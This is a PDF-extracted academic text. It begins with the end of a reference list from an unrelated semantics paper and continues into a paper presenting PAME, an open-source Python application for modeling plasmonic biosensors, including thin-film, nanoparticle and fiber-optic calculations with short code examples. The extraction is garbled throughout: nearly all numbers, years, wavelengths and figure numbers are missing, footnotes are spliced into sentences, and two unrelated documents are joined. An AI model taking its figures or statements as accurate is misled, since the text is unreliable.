technologies, volume (long papers), pages – , new orleans, la. roger c. schank and robert p. abelson. . scripts, plans, and knowledge. in proceedings of the th international joint conference on artificial intelligence - volume , pages – . karin kipper schuler. . verbnet: a broad- coverage, comprehensive verb lexicon. ph.d. thesis, computer and information science department, universiy of pennsylvania. natalia silveira, timothy dozat, marie-catherine de marneffe, samuel bowman, miriam connor, john bauer, and chris manning. . a gold standard dependency corpus for english. in proceedings of the ninth international conference on language resources and eval- uation (lrec’ ). gabriel stanovsky, judith eckle-kohler, yevgeniy puzikov, ido dagan, and iryna gurevych. . integrating deep linguistic fea- tures in factuality prediction over unified data- sets. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : short papers), pages – , vancouver. siddharth vashishtha, benjamin van durme, and aaron steven white. . fine-grained temporal relation extraction. arxiv, cs.cl/ . v . zeno vendler. . 
verbs and times. philo- sophical review, ( ): – . christopher walker, stephanie strassel, julie medero, and kazuaki maeda. . ace multilingual training corpus ldc t . linguistic data consortium, philadelphia, pa. aaron steven white, kyle rawlins, and benjamin van durme. . the semantic proto-role linking model. in proceedings of the th conference of the european chapter of the association for computational linguistics, volume , pages – , valencia. aaron steven white, drew reisinger, keisuke sakaguchi, tim vieira, sheng zhang, rachel rudinger, kyle rawlins, and benjamin van durme. . universal decompositional semantics on universal dependencies. in pro- ceedings of the conference on empirical methods in natural language processing, pages – , austin, tx. sheng zhang, rachel rudinger, kevin duh, and benjamin van durme. a. ordinal common-sense inference. transactions of the association for computational linguistics, : – . sheng zhang, rachel rudinger, and benjamin van durme. b. an evaluation of predpatt and open ie via stage semantic role labeling. in iwcs , th international conference on computational semantics, short papers, montpellier. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction background annotation framework framework validation comparison to standard ontology bulk annotation exploratory analysis models results analysis conclusion pame: plasmonic assay modeling environment submitted may accepted july published august corresponding author adam hughes, hugadams@gwmail.gwu.edu academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright hughes et al. distributed under creative commons cc-by . open access pame: plasmonic assay modeling environment adam hughes, zhaowen liu and mark e. reeves the george washington university, washington, d.c., usa abstract plasmonic assays are an important class of optical sensors that measure biomolecular interactions in real-time without the need for labeling agents, making them especially well-suited for clinical applications. through the incorporation of nanoparticles and fiberoptics, these sensing systems have been successfully miniaturized and show great promise for in-situ probing and implantable devices, yet it remains challenging to derive meaningful, quantitative information from plasmonic responses. this is in part due to a lack of dedicated modeling tools, and therefore we introduce pame, an open-source python application for modeling plasmonic systems of bulk and nanoparticle-embedded metallic films. pame combines aspects of thin-film solvers, nanomaterials and fiber-optics into an intuitive graphical interface. some of pame’s features include a simulation mode, a database of hundreds of materials, and an object-oriented framework for designing complex nanomaterials, such as a gold nanoparticles encased in a protein shell. an overview of pame’s theory and design is presented, followed by example simulations of a fiberoptic refractometer, as well as protein binding to a multiplexed sensor composed of a mixed layer of gold and silver colloids. these results provide new insights into observed responses in reflectance biosensors. 
subjects computational biology, scientific computing and simulation, software engineering keywords assays, bioengineering, python, modeling, biosensing, simulation, software, plasmonics, nanoparticles, fiberoptics, thin films introduction plasmonic sensors refer to a class of label-free detection platforms that utilize the optical properties of metals as a transduction mechanism to measure physical, chemical and biomolecular processes. these sensors have been utilized in immunology research (pei et al., ; tang, dong & ren, ), drug discovery (chen, obinata & izumi, ; kraziński, radecki & radecka, ), dna mutations (litos et al., ), and in many other novel applications. the conventional configuration of a plasmonic sensor is a thin layer of metal, most commonly gold or silver, deposited on a glass chip and illuminated from below at oblique incidence. this induces plasmon excitations along the surface of the film. this design has been successfully commercialized by biacoretm, and has been extended to include multilayer and mixed-alloy films (sharma & gupta, ; sharma & gupta, ), and films deposited on optical fibers. over the same time period, gold and silver nanoparticles (aunps, agnps) gained attention for their potential in drug delivery (jong, ; wilczewska et al., ), and their intrinsic sensing properties, as how to cite this article hughes et al. ( ), pame: plasmonic assay modeling environment. peerj comput. sci. :e ; doi . /peerj-cs. mailto:hugadams@gwmail.gwu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. each individual nanoparticle acts as a nanoscale transducer. surface plasmons localized to roughly a nm region around the colloid (malinsky et al., ) are excited by light of any angle of incidence, and exhibit strong electromagnetic hotspots (barrow et al., ; cheng et al., ) with greater sensitivity to their local environment than bulk films. this is especially true for non-spherical nanoparticles like nanorods and nanostars (yin et al., ; nikoobakht & el-sayed, ; kessentini & barchiesi, ), and leads to great field-enhancements for raman spectroscopy (freeman et al., ; sau et al., ). while free solutions of colloids alone can serve as sensors (jans et al., ; tang, dong & ren, ), they are easily destabilized by surface agents, and alterations in salinity and ph of their surrounding environment, resulting in particle aggregation (pease et al., ; zakaria et al., ). nanoparticle monolayers engineered through vapor deposition (singh & whitten, ), lithography (haes et al., ), or self-assembly onto organosilane linkers (nath & chilkoti, ; brown & doorn, ; fujiwara, kasaya & ogawa, ) now commonly replace their bulk film counterparts, since they retain the enhanced sensitivity and flexible surface chemistry of the colloids, while being less prone chemically-deposited nanoparticles are slightly mobile in the film, and still tend to form dimers, trimers and higher order clusters under certain conditions (scarpettini & bragas, ; hughes et al., ). to aggregation. label-free measurements are indirect and prone to false-positives, as it can be difficult to distinguish specific binding events from non-specific binding, adsorption onto the sensor surface, and changes in the environment due to heating, convection and other processes. 
to mitigate these effects, plasmonic sensors undergo an extensive standardization process. first, they are calibrated to yield a linear response to bulk refractive index changes. next, the sensor surface is modified to be neutral, hydrophillic and sparsely covered with for planar gold chips, dextran provides an optimal coating; however, for nanoparticles, short-chain alkanethiols and polyethylene glycols are preferred due to their smaller size (malinsky et al., ; mayer et al., ). covalently deposited ligands. to measure ligand-analyte association and dissociation constants, ka,kd, solutions of varying concentration of analyte are washed over the surface, and the response is measured and interpreted within a protein interaction model (pollard, ; chang et al., ). each of these steps impose challenges for plasmonic sensors utilizing nanoparticle-embedded films. primarily, the sensor response becomes highly sensitive to the film topology (quinten, ; lans, ), which is difficult to interpret and optimize without modeling tools. furthermore, measurements of ka and kd require varying analyte concentrations under identical surface conditions. commercial systems often employ multichannel-sampling on a single surface (attana, ), or multiplex multiple surfaces in a single run (fortebio, ), while researchers mostly rely on the presumption of identical sensor surface topology, chemistry and experimental conditions. without a quantitative model for sensor response to protein binding, it is impossible to estimate how many molecules are adsorbed on the sensor. this information is critical to validating binding models; for example, whether a measured response is too large to be described by a : monomeric reaction. is the amount of deposited ligand likely to lead to avidity effects? in non-equilibrium applications such as monitoring the hormone levels of cells, the analyte concentration is unknown and only a single excretion event may occur; in such cases, the ability to translate optical responses directly into quantitative estimations of ligand and receptor through modeling is paramount. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. researchers modeling plasmonic systems may opt to use monolithic design tools like comsoltm multiphysics and lumericaltm solutions. while such tools offer comprehensive photonic design environments, they are quite general in design and carry more overhead than is needed to model the basic fiber and chip geometries described in this paper. on the other hand, related open-source tools are too disjoint to be effectively integrated into a single workflow. for example, thin-film solvers are widely available (for a comprehensive list, see optenso, ), and the mnpbem toolbox (hohenester & trugler, ) offers a matlabtm interface for nanomaterial design. yet, to design materials in mnpbem and integrate them into film solvers requires a customized pipeline. furthermore, simple geometric fill models for nanoparticle-protein binding are not available in these tools, even though these fill models have been successful (klebstov, ; lopatynskyi et al., ; tsai et al., ) in describing aunp-protein binding in free solution. with an abundance of parameters, ranging from the nanoscale to the macroscopic, characterizing a biosensor can quickly become intractable and a specialized solution is needed. 
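For reference, the simplest protein-interaction model alluded to above is the 1:1 (Langmuir-type) scheme; a minimal sketch of its association phase is given below. The rate constants, analyte concentration, and maximal response are illustrative values, not taken from any particular sensor, and real analyses would also fit the dissociation phase and instrument drift.

```python
import numpy as np

def binding_response(t, conc, ka, kd, rmax):
    """Idealized 1:1 association curve: dR/dt = ka*C*(Rmax - R) - kd*R with
    R(0) = 0, whose closed-form solution is Req * (1 - exp(-kobs*t))."""
    kobs = ka * conc + kd
    req = ka * conc * rmax / kobs          # equilibrium response at this concentration
    return req * (1.0 - np.exp(-kobs * t))

t = np.linspace(0, 300, 7)                 # seconds (illustrative)
print(binding_response(t, conc=50e-9, ka=1e5, kd=1e-3, rmax=100.0))
```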
herein, the plasmonic assay modeling environment (pame) is introduced as an open-source python application for modeling plasmonic biosensors. pame is a fully graphical application that integrates aspects of material science (material modeling, effective medium theories, nanomaterials), thin-film design, fiberoptics, ellipsometry and spectroscopy, with the goal of providing a simple framework for designing, simulating and characterizing plasmonic biosensors. pame helps to illuminate non-obvious relationships between sensor parameters and response. after an overview of its theory and design, several examples are presented. first, pame is used to model the refractometric response of an aunp-coated optical fiber to increasing concentrations of glycerin. it is shown that the response peaks at λmax ≈ nm , a result supported by experiment, even though the nanoparticles absorb most strongly at λmax ≈ nm. next, pame simulates protein binding events onto a mixed layer of gold and silver nanoparticles in a multiplexed fiber setup. finally, a brief overview of pame’s requirements, performance and future development is presented. additional examples in the form of ipython notebooks (perez & granger, ), as well as video tutorials, are available in the supplemental information. theory and design many plasmonic sensors can be modeled as a multilayer stack of homogeneous materials, also referred to as films or dielectric slabs, arranged on a substrate so as to transduce interactions between light and the stack. the substrate represents a light guide such as a chip or an optical fiber. the transduced signal is some optical property of the multilayer, commonly transmittance or spectral reflectance, or in the case of ellipsometry, changes in the reflected light’s polarization state (moirangthem, chang & wei, ). much of the diversity in plasmonic sensors is therefore due to design parameters rather than dissimilar physics, and has been described thoroughly by bd gupta (sharma & gupta, ; sharma & gupta, ; gupta & verma, ; singh, verma & gupta, ; mishra, mishra & gupta, ). pame was designed specifically to model these types of systems. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pame’s user interface. (a) panel to view material quantities such as index of refraction, n(λ), and nanoparticle extinction cross section, σext(λ). currently shown is e(λ) for a layer of gold nanoparticles in water at a fill fraction of about % using garcia’s mixing model. (b) panel of plotted optical properties such as transmittance, t(λ), and reflectance, Γ(λ). here the reflectance coefficient for p-polarized light rp(λ) is shown. the spread in the linewidth corresponds to variations in light modes over the range > θ ≥ ◦. (c) five primary panels and tabular interface (d) for constructing the dielectric stack: silica (substrate) | organosilanes ( nm) | aunps in h o ( nm) |h o (solvent) for ≤ λ ≤ nm. pame is designed with four integrated subprograms: a materials adapter to model bulk, composite, and nanomaterials; a multilayer thinfilm calculator; a substrate design interface; and a simulation and data analysis framework. figure shows a screenshot of the pame’s main window, with its five primary panels: main, substrate, stack, material and simulations. main refers to global settings, for example the operating wavelength range. the remaining tabs correspond directly to the four aforementioned subprograms. 
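Schematically, the substrate enters this model only through the angular weighting: the measured spectrum is the f(θ)-weighted combination of per-angle spectra produced by the multilayer solver. A small sketch of that bookkeeping follows, with the solver itself left abstract and all angles, weights, and spectra invented for illustration.

```python
import numpy as np

def weighted_spectrum(angles_deg, weights, spectrum_fn):
    """Combine per-angle spectra using the substrate weighting f(theta).
    `spectrum_fn(theta)` stands in for a multilayer calculation and returns,
    e.g., reflectance versus wavelength at that incidence angle."""
    w = np.asarray(weights, dtype=float)
    w = w / w.sum()
    spectra = np.stack([np.asarray(spectrum_fn(th)) for th in angles_deg])
    return w @ spectra

# Chip geometry: a single angle, i.e., f(theta) = delta(theta - theta_0).
print(weighted_spectrum([45.0], [1.0], lambda th: [0.031, 0.052, 0.047]))

# Fiber geometry: several guided-ray angles with (illustrative) modal weights.
print(weighted_spectrum([70.0, 75.0, 80.0], [0.2, 0.3, 0.5],
                        lambda th: [0.03 + 0.0002 * th] * 3))
```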
together, they provide a complete framework for modeling a plasmonic sensor, and lend a useful narrative that will be followed in the ordering of the remaining sections of this paper. incidentally, the progression from substrate, stack and material represents a top-down view of the model, starting from macroscopic parameters and working down to the microscopic. substrate types pame supports two substrates: optical fibers and chips. substrates mediate the interaction between light and the multilayer stack through a weighting function, n i f (θi), where θi corresponds to the angle of the ith incident light ray onto the substrate. the chip is meant to describe simple configurations, for example a gold film deposited on a glass slide and illuminated from below at a single angle, θo. in this case, n i f (θi) = δ(θo). for optical fibers, the propagation modes are determined by properties of the fiber itself, such as its numerical aperture, core and cladding materials, and its ability to maintain polarization states. furthermore, the placement of the multilayer on different regions of the fiber has a hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure light propagation in fiber optic biosensor. (a) a light ray propagating in an optical fiber core. transverse refers to a multilayer deposited along the propagation direction, while axial is perpendicular and deposited on the fiber endface. the fiber cladding and jacket are hidden for clarity. (b) the θ = plane wave incident on the stack. (c) illustration of the homogenized multilayers, and some of the electromagnetic quantities associated with each interface, reproduced with permission from (orfanidis, ). significant effect on f (θi), and hence on the optical response of the sensor. the two most common orientations, either transversally along the propagation direction on the fiber, see mishra, mishra & gupta ( ) eq. ( ) for an example of f (θ ) for a transversal fiber with collimated light source. or axially on the cleaved fiber endface, are shown in fig. . both of these orientations have been realized as biosensors (lipoprotein et al., ; shrivastav, mishra & gupta, ), with the axial configuration, often referred to as a “dip sensor” because the endface is dipped into the sample, appearing more often in recent years (mitsui, handa & kajikawa, ; wan et al., ; jeong et al., ; sciacca & monro, ). pame does not presently support multilayers along bent regions of the fiber, or along sharpened optical tips (issa & guckenberger, ; library et al., ) and assumes all rays to be plane waves. for advanced waveguide design and modal analysis, we recommend lumericaltm mode solutions. pame’s substrate interface queries users to configure chip and optical fiber parameters, rather than working directly with f (θi). users can choose between multilayer orientation, polarization state (p, s or unpolarized), and range of angles, all from which pame builds f (θ ). the interface is user-friendly, and attempts to obviate incompatible or unphysical settings. for instance, the ellipsometric amplitude (Ψ) and phase (δ) depend on ratios of p-polarized to s-polarized light reflectance, but users may opt to only compute s-waves, resulting in errant calculations downstream. anticipating this, pame provides an ellipsometry mode, which when enabled, prevents the polarization state from being changed. 
by combining substrate types with context modes, pame provides a simple interface for modeling a number of common optical setups.

multilayer stack

figure depicts the multilayer stack, in which each dielectric slab is assumed to be homogeneous and of uniform thickness; heterogeneous materials must be homogenized through an effective medium theory (emt). furthermore, the multilayer model presumes that layers are connected by smooth and abrupt boundaries so as to satisfy fresnel's equations. the first and last layers, conventionally referred to as "substrate" and "solvent," are assumed to be semi-infinite, with incident light originating in the substrate. the treatment of anisotropic layers without effective medium approximations is discussed in the future improvements section.

a light ray incident on the stack at angle θ, as set by f(θ), will reflect, refract and absorb in accordance with fresnel's equations. for example, in a simple two-layer system, the light reflectance, Γ(λ), at the boundary between n₁ and n₂ is

$$\Gamma = \frac{1}{2}\left(|r_s|^2 + |r_p|^2\right) = \frac{1}{2}\left[\left(\frac{n_1\cos\theta_i - n_2\cos\theta_t}{n_1\cos\theta_i + n_2\cos\theta_t}\right)^2 + \left(\frac{n_1\cos\theta_t - n_2\cos\theta_i}{n_1\cos\theta_t + n_2\cos\theta_i}\right)^2\right],$$

where θi and θt are the angles of incidence upon, and transmission into, n₂ from n₁, and rs and rp are the complex reflection coefficients of the s- and p-polarized light. for n layers, fresnel's equations are solved recursively using the transfer matrix method (tmm), also referred to as the recursive rouard method (rouard, ; lecaruyer et al., ). in addition to the reflectance, transmittance and absorbance, a variety of optical quantities are computed in the multilayer, including the poynting vector, the complex wave vector angle, ellipsometric parameters, and film color. for a thorough treatment of light propagation in multilayer structures, see orfanidis ( ) and steed ( ). pame offers a simple tabular interface for adding, removing, and editing materials in arbitrarily many layers, as shown in fig. c. pame delegates the actual tmm calculation to an adapted version of the python package tmm (byrnes, ).

pame material classes

pame includes three material categories: bulk materials, composite materials and nanomaterials. a bulk material such as a gold film is sufficiently characterized by its index of refraction. the optical properties of a gold nanoparticle, however, depend on the index of gold, particle size, the surrounding medium, a particle-medium mixing model, and other parameters. a nanoparticle with a shell is even more intricate. pame encapsulates a rich hierarchy of materials in an object-oriented framework to ensure compatibility with the multilayer stack and the interactive plotting interface.

bulk material

in pame, a "bulk" material refers to a single, homogeneous substance, fully characterized by its complex index of refraction, ñ = n + iκ, or dielectric function, ẽ = e + iϵ, which are related through a complex square root (ñ = √ẽ, i.e., ẽ = ñ²), giving the relations

$$e = n^2 - \kappa^2, \qquad \epsilon = 2n\kappa, \qquad n = \sqrt{\tfrac{1}{2}\left(\sqrt{e^2+\epsilon^2} + e\right)}, \qquad \kappa = \sqrt{\tfrac{1}{2}\left(\sqrt{e^2+\epsilon^2} - e\right)}.$$

here n and e, and optical quantities derived from them, are understood to be dispersive functions of wavelength, n(λ) and e(λ). the refractive index n is assumed to be independent of temperature, and the material non-magnetic at optical frequencies.
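because pame delegates its transfer-matrix calculation to an adapted version of the tmm package, the reflectance of a simple stack can be reproduced directly with that library. the layer thicknesses and (non-dispersive) indices below are illustrative placeholders, not values taken from the text; this is a standalone sketch rather than pame's internal code.

```python
import numpy as np
import tmm  # Steven Byrnes' transfer-matrix package (pip install tmm)

# illustrative stack: semi-infinite silica | thin organosilane film |
# homogenized AuNP layer (complex effective index) | semi-infinite water
n_list = [1.45, 1.46, 1.60 + 0.45j, 1.33]   # refractive index of each layer
d_list = [np.inf, 2.0, 24.0, np.inf]        # thicknesses in nm; outer layers semi-infinite

wavelengths = np.linspace(400, 800, 201)    # nm
theta_0 = np.deg2rad(30)                    # incidence angle inside the substrate

# unpolarized reflectance = average of s- and p-polarized reflectance
R = np.array([
    0.5 * (tmm.coh_tmm('s', n_list, d_list, theta_0, lam)['R'] +
           tmm.coh_tmm('p', n_list, d_list, theta_0, lam)['R'])
    for lam in wavelengths
])

print("reflectance at %.0f nm: %.4f" % (wavelengths[0], R[0]))
```

in practice the nanoparticle layer's effective index would itself be dispersive, so the constant complex value above is only a stand-in for the emt output described in the next section.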
(note that ferromagnetic nanoparticles do exist, and have already been utilized in sensing applications (pellegrini & mattei, ).) bulk materials are obtained through experimental measurements, modeling, or a combination of the two; for example, measuring n at several wavelengths and fitting to a dispersion model such as the sellmeier equation,

$$n^2(\lambda) = 1 + \frac{a_1\lambda^2}{\lambda^2 - b_1} + \frac{a_2\lambda^2}{\lambda^2 - b_2} + \frac{a_3\lambda^2}{\lambda^2 - b_3} + \cdots$$

pame is bundled with several dispersion models, including the cauchy, drude and sellmeier relations, as well as two freely-available refractive index catalogs: sopra ( ) and refractiveindex.info (polyanskiy, ), comprising over , refractive index files (materials are supplied as-is with no guarantee of accuracy: use at your own discretion). pame includes a materials adapter to browse and upload materials, as shown in fig. . selected materials are automatically converted, interpolated, and expressed in the working spectral unit (nm, ev, cm, ...) and range. pame's plots respond to changes in material parameters in real time.

figure : screenshot of pame's material adapter. (a) tree view of available bulk material models, files and bundled catalogues. (b) preview of the selected material, including available metadata, notes and an interpolated fit to the current spectral range and unit system; currently showing ẽ for gold from johnson & christy ( ). (c) search utility to find and batch-upload materials.

composite materials

a composite consists of two materials bound by a mixing function. for example, a gold-silver alloy could be modeled as bulk gold and silver, mixed through an effective mixing theory (emt). the complexity of the emt is related to the electromagnetic interactions between the materials. for example, for binary liquid mixtures with refractive indices n₁ and n₂ and fill fraction φ, the composite can be approximated as n_mixed = n₁φ + n₂(1 − φ), with more complex liquid mixing models like weiner's relation and heller's relation yielding negligible differences (bhatia, tripathi & dubey, ). for solid inclusions, the extension of the maxwell–garnett (mg) mixing rule (garnett, ) by garcía, llopis & paje ( ) has been shown effective, even when the particles are non-spherical and anisotropically clustered (li et al., ). at present, pame includes mg, with and without garcia's extension, the bruggeman equation (bruggeman, ), the quasi-crystalline approximation with coherent potential (liu et al., ; tsang, kong & shin, ), and various binary liquid mixing rules. these are hardly exhaustive, and new methods are continually appearing (amendola & meneghetti, ; battie et al., ; malasi, kalyanaraman & garcia, ). adding emts to pame is straightforward, and more will be added in upcoming releases.

composite materials are not limited to bulk materials, but include combinations of composites and/or nanomaterials, for example gold and silver nanoparticles embedded in a glass matrix. however, one must be aware of the limitations of implicit mixing models. for example, consider a layer of gold nanoparticles: as coverage increases, particle–particle interactions are taken into account in garcia's emt through the parameter k. emts describing inclusions of two or more material types have been described (zhdanov, ; bossa et al., ), and will be available in future versions. pame's geometric fill models are also implemented as composite material classes. for example, small spheres of material x binding to the surface of a larger sphere of material y serves as a useful model for proteins binding to gold nanoparticles (lopatynskyi et al., ). an ensemble of spherical
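as an illustration of the simplest solid-inclusion emt mentioned above, the classical maxwell–garnett rule can be written in a few lines. the dielectric values and fill fraction below are placeholders; garcia's size-corrected extension and the bruggeman rule are not shown.

```python
import numpy as np

def maxwell_garnett(eps_inclusion, eps_host, fill_fraction):
    """Classical Maxwell-Garnett effective dielectric function for spherical
    inclusions occupying a volume fraction `fill_fraction` of the host."""
    f = fill_fraction
    num = eps_inclusion + 2 * eps_host + 2 * f * (eps_inclusion - eps_host)
    den = eps_inclusion + 2 * eps_host - f * (eps_inclusion - eps_host)
    return eps_host * num / den

def binary_liquid(n1, n2, phi):
    """Simple volume-weighted index for a binary liquid mixture."""
    return n1 * phi + n2 * (1 - phi)

# usage with placeholder values: gold-like inclusions (eps roughly -11 + 1.3j
# near the visible plasmon band) dispersed in water (eps = 1.33**2) at ~8% fill
eps_eff = maxwell_garnett(-11 + 1.3j, 1.33 ** 2, 0.08)
n_eff = np.sqrt(eps_eff)   # complex effective refractive index of the mixed layer
print("effective index:", n_eff)
```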
inclusions on a disk is the correct geometry for modeling gold nanoparticles adhered to the cleaved end of a fiber surface. pame's fill models track the number of inclusions, fill fraction, and other quantitative parameters at any given time. this enables macroscopic quantities like sensor sensitivity to be measured against microscopic parameters like the number of proteins bound to the nanoparticles.

nanomaterials

in pame, nanomaterials are treated as a special instance of a composite material whose properties depend on a core material, a medium material, possibly an intermediate shell material, and particle size. a layer of nanoparticles is always embedded in some other medium, for example a slab of water or a sol–gel matrix of glass; therefore, in an object-oriented framework, a nanomaterial is a subclass of a composite material, with additional attributes like particle size and implicit optical properties. a key distinction between nanomaterials and their bulk counterparts is that the optical properties of nanoparticles are highly sensitive to both the particle size and the permittivity of the surrounding medium. the implicit optical properties of spheroidal nanoparticles, such as the extinction cross section, σext, are solved analytically through mie theory (bohren, ; jain et al., ). this is a fundamentally important quantity, as the position and shift of the extinction cross section maximum, known as the localized plasmon resonance (willets & van duyne, ; anker et al., ), is often the best indicator of the state of the nanoparticles comprising the system. while the full solution to the extinction cross section is described by the sum of an infinite series of ricatti–bessel functions, described in full in lopatynskyi et al. ( ), for brevity consider the approximate expression (jeong et al., ; van de hulst, ):

$$\sigma_{ext} \approx \frac{8\pi^2 r^3}{\lambda}\,\mathrm{Im}\!\left[\frac{m^2-1}{m^2+2}\right] + \frac{128\pi^5 r^6}{3\lambda^4}\left|\frac{m^2-1}{m^2+2}\right|^2,$$

where the first term approximates σabs, the second approximates σscatt, and m is the ratio of the refractive index of the core particle material to that of the suspension medium (e.g., gold to water). the polynomial dependence on r, λ and m demonstrates the high variability in the optical properties of nanoparticles, and by extension, of the biosensors that utilize them. typical cross sections for silver and gold nanospheres are depicted in fig. .

figure : theoretical optical absorption and scattering properties of gold and silver nanoparticles. extinction, absorption and scattering cross sections of (a) nm silver and (b) nm gold nanoparticles computed in pame using reported permittivities from hagemann, gudat & kunz ( ) and gao, lemarchand & lequime ( ), respectively, which produced more accurate cross sections than the typically-used drude model.

while optical constants derived from mie theory are computed analytically, it is important to recognize that in a dielectric slab, nanomaterials are represented by an effective dielectric function; thus, optical constants like transmittance or reflectance will be computed using an effective dielectric function representing the nanoparticle layer.
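the approximate expression above can be evaluated directly. a minimal sketch follows, assuming the small-particle (dipole) limit and treating λ as the wavelength in the surrounding medium; the optical constants are placeholders rather than the tabulated permittivities used for the figure.

```python
import numpy as np

def dipole_cross_sections(radius_nm, wavelength_nm, n_particle, n_medium):
    """Small-particle (dipole-limit) absorption and scattering cross sections
    for a sphere, following the approximate expression in the text.
    Returns (sigma_abs, sigma_scatt, sigma_ext) in nm^2."""
    lam = wavelength_nm / n_medium        # wavelength in the host medium
    m = n_particle / n_medium             # relative (complex) refractive index
    g = (m ** 2 - 1) / (m ** 2 + 2)       # Clausius-Mossotti factor
    r = radius_nm
    sigma_abs = (8 * np.pi ** 2 * r ** 3 / lam) * np.imag(g)
    sigma_scatt = (128 * np.pi ** 5 * r ** 6 / (3 * lam ** 4)) * np.abs(g) ** 2
    return sigma_abs, sigma_scatt, sigma_abs + sigma_scatt

# usage with placeholder optical constants for a small gold sphere in water
sig_abs, sig_sca, sig_ext = dipole_cross_sections(
    radius_nm=10, wavelength_nm=520, n_particle=0.47 + 2.4j, n_medium=1.33)
print("sigma_ext ~ %.1f nm^2 (abs %.1f, scatt %.1f)" % (sig_ext, sig_abs, sig_sca))
```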
pame currently supports nanospheres and nanospheres with shells; planned support for exotic particle morphologies is described in the future improvements section. similar treatments of nanoparticle layers with effective media approximations have been successful (li et al., ; liu et al., ), even for non-spherical particles and for ensembles of different sized particles (battie et al., ). this is a salient difference between pame and numerical approaches like the boundary element method (bem), discrete dipole approximation (dda) and finite-difference time-domain (fdtd): pame relies on mixing theories, and hence is constrained by any underlying assumptions of the mixing model. for a more in-depth discussion on nanoparticle modeling, see myroshnychenko et al. ( ) and trügler ( ).

simulation and data analysis

pame's interactivity makes it ideal for exploring the relationships between system variables, while the simulation environment provides the means to systematically increment a parameter and record the corresponding response; for example, incrementing the fill fraction of inclusions in a nanoparticle shell to simulate protein binding, or incrementing the refractive index of the solvent to simulate a refractometer. because most updates in pame are automatically triggered, simulations amount to incrementing parameters in a loop and storing and plotting the results. pame's simulation interface simplifies the process of setting simulation variables and storing results. it comprises three tabs. the selection tab (fig. ) is used for setting simulation parameters and value ranges; variable names like layer .d refer to the thickness of the first layer in the multilayer stack, and material .shell thickness is the size of the nanoparticle shell, in nanometers, of material . pame provides suggestions, documentation and a tree viewer to choose simulation variables, and alerts users to errant inputs or invalid ranges, for example if users try to simulate a volume fraction beyond its valid range of . to . . the notes/io tab provides a place to record notes on the simulation and to configure the output directory. pame can store all of its state variables in every cycle of the simulation, including the entire multilayer structure and all computed optical quantities, but this can lead to storing large quantities of redundant data. the storage tab lets users pick and choose their storage preferences, and even specify the quantities that should be regarded as "primary" for easy access when parsing. pame provides a simparser object to interact with saved simulations, which, while not required, is intended to be used inside an ipython notebook (perez & granger, ) environment. the simparser stores primary results in pandas (mckinney & millman, ) and scikit-spectra (hughes & liu, ) objects for easy interaction and visualization, and the remaining results are stored in json. this allows for immediate analysis of the most important simulation results, with the remaining data easily accessed later through a tree viewer and other simparser utilities.

figure : pame's simulation interface, showing the selection, notes/io and storage tabs.
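outside of the gui, the same "increment a parameter, record the response" pattern can be reproduced with a short script. the sketch below sweeps the solvent index of a toy stack with the tmm package and stores the resulting spectra in a pandas dataframe, loosely mirroring the kind of tabular primary results the simparser exposes; it is not pame's storage format, and the stack values are placeholders.

```python
import numpy as np
import pandas as pd
import tmm

wavelengths = np.linspace(400, 800, 101)        # nm
solvent_indices = np.linspace(1.33, 1.40, 8)    # simulated "refractometer" sweep

def stack_reflectance(n_solvent, lam):
    # illustrative stack: silica | 2 nm silane | 24 nm effective AuNP layer | solvent
    n_list = [1.45, 1.46, 1.60 + 0.45j, n_solvent]
    d_list = [np.inf, 2.0, 24.0, np.inf]
    return tmm.coh_tmm('s', n_list, d_list, 0.0, lam)['R']

# one reflectance column per solvent index, indexed by wavelength
results = pd.DataFrame(
    {round(ns, 3): [stack_reflectance(ns, lam) for lam in wavelengths]
     for ns in solvent_indices},
    index=pd.Index(wavelengths, name='wavelength_nm'))

# simple "primary result": mean reflectance change per refractive-index unit
sensitivity = results.mean().diff().mean() / np.diff(solvent_indices).mean()
print(results.shape, "mean dR per RIU:", sensitivity)
```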
examples of use

case : refractometer

plasmonic sensors respond to changes in their surrounding dielectric environments, and are commonly utilized as refractometers (mitsui, handa & kajikawa, ; punjabi & mukherji, ), even going so far as to measure the refractive index of a single fibroblast cell (lee et al., ). refractive index measurements can also be used to measure sensitivity and linear operating ranges. a common approach is to immerse the sensor in a medium such as water, and incrementally change the index of refraction of the medium by mixing in glycerine or sucrose. because the index of refraction as a function of glycerine concentration is well known (glycerine producers' association, ), sensor response can be expressed in refractive index units (riu). this is usually taken a step further in biosensor designs, where the rius are calibrated to underlying biophysical processes (e.g., protein absorption), either through modeling, as pame does, or through orthogonal experimental techniques such as fourier transform infrared spectroscopy (tsai et al., ). this calibration process has been described previously (jeong & lee, ; richard & anna, ), and is usually carried through in commercial plasmonic sensors. it quantifies the analyte binding capacity of the sensor, an important parameter for assessing binding models, non-equilibrium sensing, and performing one-step measurements, for example estimating the glucose levels in a blood sample. (schasfoort et al. ( ) has enumerated seven interfering effects that lead to errant calculations of equilibrium affinity constants; estimations of nanoparticle and ligand density at the sensor surface provide insights as to whether or not some of these effects are likely occurring.)

